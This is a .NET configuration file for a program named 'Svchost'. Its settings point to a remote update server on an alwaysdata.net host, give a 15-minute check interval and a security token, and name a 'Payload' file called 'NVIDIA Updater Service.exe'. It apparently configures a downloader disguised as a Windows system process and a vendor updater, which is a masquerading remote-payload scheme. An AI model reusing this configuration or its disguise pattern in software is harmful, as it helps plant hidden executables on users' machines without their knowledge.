<?xml version="1.0" encoding="utf-8"?>
<configuration>
    <configSections>
        <sectionGroup name="userSettings" type="System.Configuration.UserSettingsGroup, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" >
            <section name="Svchost.Properties.Settings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" allowExeDefinition="MachineToLocalUser" requirePermission="false" />
        </sectionGroup>
    </configSections>
    <startup> 
        <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.6.1"/>
    </startup>
    <userSettings>
        <Svchost.Properties.Settings>
            <setting name="CheckInterval" serializeAs="String">
                <value>900</value>
            </setting>
            <setting name="RemoteConfigUri" serializeAs="String">
                <value />
            </setting>
            <setting name="Setting" serializeAs="String">
                <value>http://pgeryfaut.alwaysdata.net/myapp/update.xml</value>
            </setting>
            <setting name="SecurityToken" serializeAs="String">
                <value>D68EF3A7-E787-4CC4-B020-878BA649B4CD</value>
            </setting>
            <setting name="BaseUri" serializeAs="String">
                <value>http://pgeryfaut.alwaysdata.net/myapp/</value>
            </setting>
            <setting name="version" serializeAs="String">
                <value>4</value>
            </setting>
            <setting name="Payload" serializeAs="String">
                <value>NVIDIA Updater Service.exe</value>
            </setting>
        </Svchost.Properties.Settings>
    </userSettings>
</configuration>
